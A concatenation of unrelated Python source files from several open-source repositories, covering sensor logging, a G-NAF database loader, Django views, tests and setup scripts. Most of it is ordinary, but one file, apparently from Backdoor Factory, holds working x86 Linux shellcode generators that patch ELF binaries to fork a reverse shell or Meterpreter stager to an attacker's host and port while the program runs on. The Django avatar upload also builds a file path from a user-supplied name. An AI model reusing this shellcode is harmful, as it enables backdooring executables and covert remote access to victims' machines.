stat = os.statvfs(env.get_profile_path())
free_space = stat[statvfs.F_BSIZE] * stat[statvfs.F_BAVAIL]
total_space = stat[statvfs.F_BSIZE] * stat[statvfs.F_BLOCKS]
fraction = (total_space - free_space) / float(total_space)
self._progress_bar.props.fraction = fraction
self._free_space_label.props.label = _('%(free_space)d MB Free') % \
{'free_space': free_space / (1024 * 1024)}
class DocumentsButton(BaseButton):
def __init__(self, documents_path):
BaseButton.__init__(self, mount_point=documents_path)
self.props.icon_name = 'user-documents'
self.props.xo_color = profile.get_color()
|
icarito/sugar
|
src/jarabe/journal/volumestoolbar.py
|
Python
|
gpl-3.0
| 13,211
|
import logging
import os
import psycopg2
# settings
database_name = 'postgres_database'
user = 'postgres_user'
password = 'some_password_here_lol'
port = 5432
host = 'postgres_host_normally_localhost'
path_to_gnaf_data = '/path/to/gnaf/data/'
# setup
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', level=logging.DEBUG)
def get_folder_path(support_text, absolute_path, search_path, search_name, test_name):
if not search_path and search_name in test_name:
logging.debug(support_text + absolute_path)
return absolute_path
else:
return search_path
def load_sql_file_into_db(file_path):
    with open(file_path, "r") as sql_file:
        db_cursor.execute(sql_file.read())
    db_connection.commit()
try:
db_connection = psycopg2.connect(database=database_name, user=user, password=password, host=host, port=port)
db_cursor = db_connection.cursor()
logging.info("Step 0 of 5 : Bootstrapping started...")
gnaf_parent_path = ''
extras_path = ''
table_creation_scripts_path = ''
example_view_creation_scripts_path = ''
table_creation_script_path = ''
foreign_key_script_path = ''
example_view_script_path = ''
authority_code_path = ''
standard_data_path = ''
gnaf_name = 'G-NAF '
table_creation_script_folder_name = 'GNAF_TableCreation_Scripts'
table_creation_script_name = 'create_tables_ansi.sql'
foreign_key_script_name = 'add_fk_constraints.sql'
authority_code_name = 'Authority Code'
standard_data_name = 'Standard'
psv_file_suffix = "_psv.psv"
views_script_folder_name = 'GNAF_View_Scripts'
example_view_script_name = 'address_view.sql'
SQL_STATEMENT = """ COPY %s FROM STDIN WITH CSV HEADER DELIMITER AS '|'"""
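    # copy_expert (used below) streams each pipe-delimited .psv file into its
    # table via COPY ... FROM STDIN; %s is replaced with the table name
    # derived from the file name.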
# find sub folders needed
for dirname, dirnames, filenames in os.walk(path_to_gnaf_data):
for subdirname in dirnames:
absolute_path = os.path.join(dirname, subdirname)
gnaf_parent_path = get_folder_path("G-NAF parent folder: ", absolute_path, gnaf_parent_path, gnaf_name, subdirname)
table_creation_scripts_path = get_folder_path("Table creation scripts folder: ", absolute_path, table_creation_scripts_path, table_creation_script_folder_name, subdirname)
example_view_creation_scripts_path = get_folder_path("Example View creation scripts folder: ", absolute_path, example_view_creation_scripts_path, views_script_folder_name, subdirname)
authority_code_path = get_folder_path("Authority Code folder: ", absolute_path, authority_code_path, authority_code_name, subdirname)
standard_data_path = get_folder_path("Standard data folder: ", absolute_path, standard_data_path, standard_data_name, subdirname)
# find table/fk creation scripts
for dirname, dirnames, filenames in os.walk(table_creation_scripts_path):
for filename in filenames:
absolute_path = os.path.join(table_creation_scripts_path, filename)
if not table_creation_script_path and table_creation_script_name in filename:
table_creation_script_path = absolute_path
logging.debug("Table creation script: " + table_creation_script_path)
if not foreign_key_script_path and foreign_key_script_name in filename:
foreign_key_script_path = absolute_path
logging.debug("Foreign key script: " + foreign_key_script_path)
# find views creation script
for dirname, dirnames, filenames in os.walk(example_view_creation_scripts_path):
for filename in filenames:
absolute_path = os.path.join(example_view_creation_scripts_path, filename)
if not example_view_script_path and example_view_script_name in filename:
example_view_script_path = absolute_path
logging.debug("Example views script: " + example_view_script_path)
logging.info("Step 0 of 5 : Bootstrapping finished!")
logging.info("Step 1 of 5 : Creating Schema started...")
load_sql_file_into_db(table_creation_script_path)
logging.info("Step 1 of 5 : Creating Schema finished!")
logging.info("Step 2 of 5 : Loading Authority Code data started...")
for dirname, dirnames, filenames in os.walk(authority_code_path):
num_files = str(len(filenames))
for index, filename in enumerate(filenames):
absolute_path = os.path.join(authority_code_path, filename)
authority_code_prefix = "Authority_Code_"
authority_code_suffix = psv_file_suffix
table_name = filename.replace(authority_code_prefix, "")
table_name = table_name.replace(authority_code_suffix, "")
logging.info("Importing file " + str(index + 1) + " of " + num_files + ": " + filename + " -> " + table_name)
            with open(absolute_path) as psv_file:
                db_cursor.copy_expert(sql=SQL_STATEMENT % table_name, file=psv_file)
db_connection.commit()
logging.info("Step 2 of 5 : Loading Authority Code data finished!")
logging.info("Step 3 of 5 : Loading Standard data started...")
for dirname, dirnames, filenames in os.walk(standard_data_path):
num_files = str(len(filenames))
for index, filename in enumerate(filenames):
absolute_path = os.path.join(standard_data_path, filename)
standard_data_suffix = psv_file_suffix
table_name = filename.split('_', 1)[-1]
table_name = table_name.replace(standard_data_suffix, "")
logging.info("Importing file " + str(index + 1) + " of " + num_files + ": " + filename + " -> " + table_name)
            with open(absolute_path) as psv_file:
                db_cursor.copy_expert(sql=SQL_STATEMENT % table_name, file=psv_file)
db_connection.commit()
logging.info("Step 3 of 5 : Loading Standard data finished!")
logging.info("Step 4 of 5 : Creating Foreign Key relationships creation started...")
load_sql_file_into_db(foreign_key_script_path)
logging.info("Step 4 of 5 : Creating Foreign Key relationships creation finished!")
logging.info("Step 5 of 5 : Creating example views creation started...")
load_sql_file_into_db(example_view_script_path)
logging.info("Step 5 of 5 : Creating example views creation finished!")
db_cursor.close()
db_connection.close()
except Exception as exception:
logging.error("Exception occurred: " + str(exception))
|
ajosephau/psma-gnaf-loader
|
main.py
|
Python
|
gpl-3.0
| 6,393
|
#!/usr/bin/python
# Internet de las Cosas - http://internetdelascosas.cl
#
# Description : Program that reads a DHT11 sensor
# Language : Python
# Author : Jose Zorrilla <jzorrilla@iot.cl>
# Dependencies : Adafruit library https://github.com/adafruit/Adafruit_Python_DHT
# Web : http://internetdelascosas.cl/
# Import the required libraries
import time
import datetime
import Adafruit_DHT
# Log file
log_path = "/var/log/iot/"
# DHT sensor type configuration
sensor = Adafruit_DHT.DHT11
# GPIO pin the sensor is connected to (GPIO 23)
pin = 23
# Writes a log file in log_path, named in yyyy-mm-dd_dht.log format
def write_log(text):
log = open(log_path + datetime.datetime.now().strftime("%Y-%m-%d") + "_dht.log","a")
line = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + " " + text + "\n"
log.write(line)
log.close()
# Try to run the following instructions; if anything fails, jump to the except clause
try:
    # Main infinite loop
    while True:
        # Read the humidity and temperature from the sensor
        humedad, temperatura = Adafruit_DHT.read_retry(sensor, pin)
        # If a sensor reading was obtained, record it in the log file
        if humedad is not None and temperatura is not None:
            write_log("DHT Sensor - Temperature: %s" % str(temperatura))
            write_log("DHT Sensor - Humidity: %s" % str(humedad))
        else:
            write_log('Error reading the sensor')
        # Sleep for 10 seconds
        time.sleep(10)
# Runs if any instruction inside the try block fails
except Exception as e:
    # Log the error in the log file and stop execution
    write_log(str(e))
|
luckyz/raspberry
|
dht11/dht11_examples/dht_log.py
|
Python
|
gpl-3.0
| 1,700
|
#!/usr/bin/env python
import server
import time
from Sensoria.stereotypes.TimeControlData import TimeControlData
from Sensoria.stereotypes.InstantMessageData import InstantMessageData
class TemperatureSensor (server.TemperatureSensor):
def __init__ (self):
super (TemperatureSensor, self).__init__ ("HD", "Heater Temperature")
class HeaterController (server.ControlledRelayActuator):
def __init__ (self):
super (HeaterController, self).__init__ ("HC", "Heater Controller")
# Temperature levels: TL1:10 TL2:18 TL3:21 (see HeaterSettings.levels below)
class HeaterTimer (server.TimedActuator):
def __init__ (self):
super (HeaterTimer, self).__init__ ("HT", "Heater Timer")
initData = TimeControlData ()
initData.unmarshal ("PMO:000000001000000003222110 PTU:000000001000000003222110 PWE:000000001000000003222110 PTH:000000001000000003222110 PFR:000000001000000003222111 PSA:000000000322222222222211 PSU:000000000322222222222210")
ok, msg = self.write (initData)
print msg
assert ok
class HeaterSettings (server.ValueSetActuator):
def __init__ (self):
super (HeaterSettings, self).__init__ ("HS", "Heater Settings")
self.levels = [10, 18, 21]
@property
def values (self):
return self.levels
@values.setter
def values (self, v):
self.levels = v[0:3]
hd = TemperatureSensor ()
hc = HeaterController ()
ht = HeaterTimer ()
hs = HeaterSettings ()
listener = server.CommandListener ("HeatingSystem")
listener.register_sensor (hd)
listener.register_sensor (hc)
listener.register_sensor (ht)
listener.register_sensor (hs)
listener.start ()
while True:
time.sleep (1)
|
SukkoPera/Arduino-Sensoria
|
python/server3.py
|
Python
|
gpl-3.0
| 1,544
|
# Case Conductor is a Test Case Management system.
# Copyright (C) 2011 uTest Inc.
#
# This file is part of Case Conductor.
#
# Case Conductor is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Case Conductor is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Case Conductor. If not, see <http://www.gnu.org/licenses/>.
from unittest2 import TestCase
from mock import patch
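# Minimal stand-in for django.conf.settings: it records which attributes were
# read successfully ("accessed") and which were missing ("failed"), so the
# tests can assert exactly how Configuration consulted the settings object.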
class FakeSettings(object):
def __init__(self, **kwargs):
self.accessed = []
self.failed = []
self.values = {}
self.values.update(kwargs)
def __getattr__(self, attr):
try:
val = self.values[attr]
except KeyError:
self.failed.append(attr)
raise AttributeError
else:
self.accessed.append(attr)
return val
class ConfigurationTest(TestCase):
@property
def cls(self):
from ccui.core.conf import Configuration
return Configuration
def test_default(self):
conf = self.cls(SOME_SETTING="some val")
settings = FakeSettings()
with patch("ccui.core.conf.settings", settings):
val = conf.SOME_SETTING
self.assertEqual(val, "some val")
self.assertEqual(settings.failed, ["SOME_SETTING"])
def test_no_default(self):
from django.core.exceptions import ImproperlyConfigured
conf = self.cls()
settings = FakeSettings()
with patch("ccui.core.conf.settings", settings):
with self.assertRaises(ImproperlyConfigured):
conf.SOME_SETTING
self.assertEqual(settings.failed, ["SOME_SETTING"])
def test_exists(self):
conf = self.cls()
settings = FakeSettings(SOME_SETTING="a val")
with patch("ccui.core.conf.settings", settings):
val = conf.SOME_SETTING
self.assertEqual(val, "a val")
self.assertEqual(settings.accessed, ["SOME_SETTING"])
def test_default_is_fallback(self):
conf = self.cls(SOME_SETTING="default val")
settings = FakeSettings(SOME_SETTING="set val")
with patch("ccui.core.conf.settings", settings):
val = conf.SOME_SETTING
self.assertEqual(val, "set val")
self.assertEqual(settings.accessed, ["SOME_SETTING"])
|
mozilla/caseconductor-ui
|
tests/core/test_conf.py
|
Python
|
gpl-3.0
| 2,735
|
"""setuptools based packaging and installation module.
Defines the project properties, as well as a special command to build a
standalone executable, by using PyInstaller.
Run with --help to see available options.
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
import sys
import distutils.cmd
import distutils.log
import subprocess
from amtt.version import __version__ as amtt_version
here = path.abspath(path.dirname(__file__))
class BuildStandaloneExeCommand(distutils.cmd.Command):
"""
Custom command to build standalone executable using PyInstaller.
Invoke by executing:
python setup.py build_standalone
"""
description = 'build standalone executable with PyInstaller'
user_options = []
def initialize_options(self):
"""Set default values for user options."""
def finalize_options(self):
"""Post-process user options."""
def run(self):
"""Run command."""
sep = ';' if sys.platform == 'win32' else ':'
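        # PyInstaller's --add-data expects 'src;dst' on Windows and 'src:dst'
        # elsewhere, hence the platform-dependent separator.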
command = ' '.join([
'pyinstaller',
' --onefile',
' --add-data amtt/ui/icon64x64.png{sep}amtt/ui'.format(sep=sep),
' --add-data amtt/ui/icon64x64.gif{sep}amtt/ui'.format(sep=sep),
' --add-data amtt/exporter/isograph/emitter/xml/template-2.1.xml'
'{sep}amtt/exporter/isograph/emitter/xml'.format(sep=sep),
' --hidden-import pyexcel_xls.xls'
' amtt/main.py',
' -i resources/icon.ico',
' -n amtt_{plat}-{ver}'.format(plat=sys.platform,
ver=amtt_version),
])
self.announce('Building standalone executable with PyInstaller',
level=distutils.log.INFO)
subprocess.check_call(command, shell=True)
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='amtt',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version=amtt_version,
description='Availability Modelling Translation Toolkit',
long_description=long_description,
# The project's main homepage.
url='https://github.com/errikos/amtt',
# Author details
author='Ergys Dona',
author_email='ergys.dona@cern.ch',
# Choose your license
license='GPL-3.0',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Manufacturing',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Physics',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
# What does your project relate to?
keywords='availability engineering model translation toolkit',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['docs']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
'networkx',
'pydotplus',
'pyexcel',
'pyexcel-xls',
'sliding-window',
'lxml',
],
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
package_data={
'amtt.ui': ['icon64x64.png', 'icon64x64.gif'],
'amtt.exporter.isograph.emitter.xml': ['template-2.1.xml'],
},
# List additional groups of dependencies here (e.g. documentation
# dependencies). You can install these using the following syntax:
# $ pip install -e .[docs]
extras_require={
'docs': ['Sphinx', 'sphinx-rtd-theme'],
'build': ['PyInstaller'],
},
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'amtt=amtt.main:main',
'amtt-gui=amtt.main:ui_main',
],
},
# Provide custom command for building standalone executable
cmdclass={
'build_standalone': BuildStandaloneExeCommand,
},
)
|
errikos/amtt
|
setup.py
|
Python
|
gpl-3.0
| 5,374
|
from django.core.urlresolvers import reverse
from django.core.mail import send_mail
from django.shortcuts import render, redirect
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from .models import ActivateCode
import uuid
import os
from django.http import HttpResponse
import datetime
def register(request):
error = ""
if request.method == "GET":
return render(request, "user_register.html")
else:
username = request.POST['username'].strip()
email = request.POST['email'].strip()
password = request.POST['password'].strip()
re_password = request.POST['re_password'].strip()
        if not username or not password or not email:
            error = "No field may be empty"
        if password != re_password:
            error = "The two passwords do not match"
        if User.objects.filter(username=username).count() > 0:
            error = "User already exists"
        if User.objects.filter(email=email).count() > 0:
            error = "This email address is already registered"
if not error:
user = User.objects.create_user(username=username,
email=email, password=password)
user.is_active = False
user.save()
new_code = str(uuid.uuid4()).replace("-", "")
expire_time = datetime.datetime.now() + datetime.timedelta(days=2)
code_record = ActivateCode(owner=user, code=new_code,
expire_timestamp=expire_time)
code_record.save()
activate_link = "http://%s%s" % (request.get_host(), reverse(
"user_activate", args=[new_code]))
            send_mail('[Python Forum] Account activation email',
                      'Your activation link is: %s' % activate_link,
                      'huyuanxuan@163.com',
                      [email],
                      fail_silently=False)
else:
return render(request, "user_register.html", {"error": error})
return HttpResponse("请查收邮件激活帐户!")
def activate(request, code):
query = ActivateCode.objects.filter(code=code,
expire_timestamp__gte=datetime.datetime.now())
if query.count() > 0:
code_record = query[0]
code_record.owner.is_active = True
code_record.owner.save()
return HttpResponse("激活成功")
else:
return HttpResponse("激活失败")
@login_required
def upload_avatar(request):
if request.method == "GET":
return render(request, "upload_avatar.html")
else:
profile = request.user.userprofile
avatar_file = request.FILES.get("avatar", None)
if not avatar_file:
return HttpResponse("未选择文件")
file_name = request.user.username + avatar_file.name
        if avatar_file.size > 500 * 1024:  # 500 KB
            return HttpResponse("Image size cannot exceed 500 KB")
file_path = os.path.join("/usr/share/userres/avatar/", file_name)
with open(file_path, 'wb+') as destination:
for chunk in avatar_file.chunks():
destination.write(chunk)
url = "http://res.myforum.com/avatar/%s" % file_name
profile.avatar = url
profile.save()
return redirect("/")
|
littleghosty/forum
|
mysite/usercenter/views.py
|
Python
|
gpl-3.0
| 3,333
|
'''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only (Intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import struct
import sys
class linux_elfI32_shellcode():
"""
Linux ELFIntel x32 shellcode class
"""
def __init__(self, HOST, PORT, e_entry, SUPPLIED_SHELLCODE=None):
        # HOST/PORT could be moved out of here and into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.e_entry = e_entry
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
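        # "\x60\x9c" is PUSHAD/PUSHFD (save registers and flags); "\x9d\x61"
        # is POPFD/POPAD, so the payload can be wrapped to preserve CPU state.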
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, CavesPicked={}):
"""
        Modified metasploit linux/x86/shell_reverse_tcp shellcode
        to correctly fork the shellcode payload and continue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
self.shellcode = self.shellcode1
return (self.shellcode1)
def reverse_tcp_stager(self, CavesPicked={}):
"""
FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
        Modified metasploit linux/x86/shell/reverse_tcp shellcode
        to correctly fork the shellcode payload and continue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1")
self.shellcode = self.shellcode1
return (self.shellcode1)
def user_supplied_shellcode(self, CavesPicked={}):
"""
        For use with position-independent shellcode supplied by the user
"""
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += supplied_shellcode
self.shellcode = self.shellcode1
return (self.shellcode1)
|
codercold/Veil-Evasion
|
tools/backdoor/intel/LinuxIntelELF32.py
|
Python
|
gpl-3.0
| 5,166
|
from django.http import HttpResponse
from django.core.cache import cache
from EventSubscriptions.models import EventWithSubscriptions
import requests
'''
This view provides the final result requested by the exercise. It first looks for the result in the cache; if it is
not there, it calls the "EventWithSubscriptions" class to perform the query. If the response is successful, the
result is stored in the cache. The cache timeout is 4.2 minutes (252 seconds).
'''
def event_subscriptions(req):
if req.method == 'GET': # we process GET requests only
if req.path.split('/')[2] == '': # it is mandatory to insert characters for the event_id
return HttpResponse("The path must be: \"/events-with-subscriptions/EVENT_ID\"")
event_id = req.path.split('/')[2]
        key = 'event-with-subscriptions-' + event_id  # cache one entry per event
timeout = 252 # cache timeout (4.2 minutes)
result = cache.get(key) # trying to get the result from the cache, otherwise => query to the website
if result is None:
obj = EventWithSubscriptions(event_id)
result = obj.perform_and_combine_responses()
# if the method gives us a response code or an Exception, we do not store the result in the cache
if type(result) is int:
return HttpResponse("Server returned with the following error code: " + str(result) +
" . Please, try again later.")
if type(result) is requests.Timeout:
return HttpResponse("Connection timeout! Please, try again later")
if type(result) is requests.RequestException:
return HttpResponse("Problems with the network/server, please try again later.")
cache.set(key, result, timeout) # if the response is successful, setting the result in cache
return HttpResponse(result, content_type='application/json')
else:
return HttpResponse("Unrecognized method")
|
luispdm/Calendar42Proxy
|
EventSubscriptions/views.py
|
Python
|
gpl-3.0
| 1,983
|
# #############################################################################
# AUTHOR BLOCK:
# #############################################################################
#
# RIB Mosaic RenderMan(R) IDE, see <http://sourceforge.net/projects/ribmosaic>
# by Eric Nathen Back aka WHiTeRaBBiT, 01-24-2010
# This script is protected by the GPL: Gnu Public License
# GPL - http://www.gnu.org/copyleft/gpl.html
#
# #############################################################################
# GPL LICENSE BLOCK:
# #############################################################################
#
# Script Copyright (C) Eric Nathen Back
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# #############################################################################
# COPYRIGHT BLOCK:
# #############################################################################
#
# The RenderMan(R) Interface Procedures and Protocol are:
# Copyright 1988, 1989, 2000, 2005 Pixar
# All Rights Reserved
# RenderMan(R) is a registered trademark of Pixar
#
# #############################################################################
# COMMENT BLOCK:
# #############################################################################
#
# !/usr/bin/env python
# Builds the ribify C module from the rm_ribify.py Python script with Cython.
#
# This script is PEP 8 compliant
#
# Search TODO for incomplete code
# Search FIXME for improper code
# Search XXX for broken code
#
# #############################################################################
# END BLOCKS
# #############################################################################
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(name="ribify", version="0.0",
ext_modules = [Extension("ribify", ["rm_ribify.py"])])
|
gabyx/RIBMosaic
|
render_ribmosaic/setup.py
|
Python
|
gpl-3.0
| 2,423
|
# coding=utf-8
"""
InaSAFE Disaster risk assessment tool developed by AusAid and World Bank
- **Impact function Test Cases.**
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'akbargumbira@gmail.com'
__date__ = '11/12/2015'
__copyright__ = ('Copyright 2012, Australia Indonesia Facility for '
'Disaster Reduction')
import unittest
from safe.impact_functions.impact_function_manager import ImpactFunctionManager
from safe.impact_functions.volcanic.volcano_point_building.impact_function \
import VolcanoPointBuildingFunction
from safe.test.utilities import test_data_path, get_qgis_app
from safe.storage.core import read_layer
from safe.storage.safe_layer import SafeLayer
QGIS_APP, CANVAS, IFACE, PARENT = get_qgis_app()
class TestVolcanoPointBuildingFunction(unittest.TestCase):
"""Test for Volcano Point on Building Impact Function."""
def setUp(self):
registry = ImpactFunctionManager().registry
registry.clear()
registry.register(VolcanoPointBuildingFunction)
def test_run(self):
"""TestVolcanoPointBuildingFunction: Test running the IF."""
volcano_path = test_data_path('hazard', 'volcano_point.shp')
building_path = test_data_path('exposure', 'buildings.shp')
hazard_layer = read_layer(volcano_path)
exposure_layer = read_layer(building_path)
impact_function = VolcanoPointBuildingFunction.instance()
impact_function.hazard = SafeLayer(hazard_layer)
impact_function.exposure = SafeLayer(exposure_layer)
impact_function.run()
impact_layer = impact_function.impact
# Check the question
expected_question = (
'In the event of volcano point how many buildings might be '
'affected')
message = 'The question should be %s, but it returns %s' % (
expected_question, impact_function.question)
self.assertEqual(expected_question, impact_function.question, message)
        # All 181 buildings should be categorised into the 3000 zone,
        # i.e. a value of 3 each in the target field
zone_sum = sum(impact_layer.get_data(
attribute=impact_function.target_field))
expected_sum = 3 * 181
message = 'Expecting %s, but it returns %s' % (expected_sum, zone_sum)
self.assertEqual(zone_sum, expected_sum, message)
def test_filter(self):
"""TestVolcanoPointBuildingFunction: Test filtering IF"""
hazard_keywords = {
'volcano_name_field': 'NAME',
'hazard_category': 'multiple_event',
'keyword_version': 3.2,
'title': 'Volcano Point',
'hazard': 'volcano',
'source': 'smithsonian',
'layer_geometry': 'point',
'layer_purpose': 'hazard',
'layer_mode': 'classified',
}
exposure_keywords = {
'license': 'Open Data Commons Open Database License (ODbL)',
'keyword_version': 3.2,
'structure_class_field': 'TYPE',
'title': 'Buildings',
'layer_geometry': 'polygon',
'source': 'OpenStreetMap - www.openstreetmap.org',
'date': '26-03-2015 14:03',
'layer_purpose': 'exposure',
'layer_mode': 'classified',
'exposure': 'structure'}
impact_functions = ImpactFunctionManager().filter_by_keywords(
hazard_keywords, exposure_keywords)
message = 'There should be 1 impact function, but there are: %s' % \
len(impact_functions)
self.assertEqual(1, len(impact_functions), message)
retrieved_if = impact_functions[0].metadata().as_dict()['id']
expected = ImpactFunctionManager().get_function_id(
VolcanoPointBuildingFunction)
message = 'Expecting %s, but getting %s instead' % (
expected, retrieved_if)
self.assertEqual(expected, retrieved_if, message)
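# Standard unittest entry point, added for convenience; the original module
# relies on an external test runner:
if __name__ == '__main__':
    unittest.main()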
|
dynaryu/inasafe
|
safe/impact_functions/volcanic/volcano_point_building/test/test_volcano_point_building.py
|
Python
|
gpl-3.0
| 4,136
|
# Copyright 2009 Noam Yorav-Raphael
#
# This file is part of DreamPie.
#
# DreamPie is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DreamPie is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with DreamPie. If not, see <http://www.gnu.org/licenses/>.
# This file is a script (not a module) run by the DreamPie GUI.
# It expects one argument: the port to connect to.
# It imports the dreampielib package from the subp-py2 or subp-py3 path
# (which is expected to be in the directory of __file__),
# and runs dreampielib.subprocess.main(port).
import sys
from os.path import abspath, join, dirname
def main():
port = int(sys.argv[1])
py_ver = sys.version_info[0]
lib_name = abspath(join(dirname(__file__), 'subp-py%d' % py_ver))
sys.path.insert(0, lib_name)
from dreampielib.subprocess import main as subprocess_main
del sys.path[0]
if sys.version_info[:2] == (3, 0):
sys.stderr.write("Warning: DreamPie doesn't support Python 3.0. \n"
"Please upgrade to Python 3.1.\n")
subprocess_main(port)
if __name__ == '__main__':
main()
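# Example invocation (hedged; the port is normally supplied by the DreamPie
# GUI, and 9876 below is only an arbitrary illustration):
#
#     python subp_main.py 9876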
|
noamraph/dreampie
|
dreampielib/data/subp_main.py
|
Python
|
gpl-3.0
| 1,566
|
import csv
from dateutil.parser import parse
from adoptarbol.tree.models import Tree
def load(filename):
with open(filename, encoding='utf-8') as f:
reader = csv.reader(f)
header = next(reader)
def pos_for(field):
return header.index(field)
def float_or_none(string):
try:
                return float(string)
except ValueError:
return None
for row in reader:
# codigo = str(row[pos_for('codigo')]),
            print('Processing ', row)
tree = {'code': row[pos_for('codigo')],
'common_name': row[pos_for('especie')],
'scientific_name': row[pos_for('cientifico')],
'family': row[pos_for('familia')],
'coord_utm_e': float_or_none(row[pos_for('utm_x')].replace(',', '.')),
'coord_utm_n': float_or_none(row[pos_for('utm_y')].replace(',', '.')),
'coord_utm_zone_letter': row[pos_for('utm_zone')],
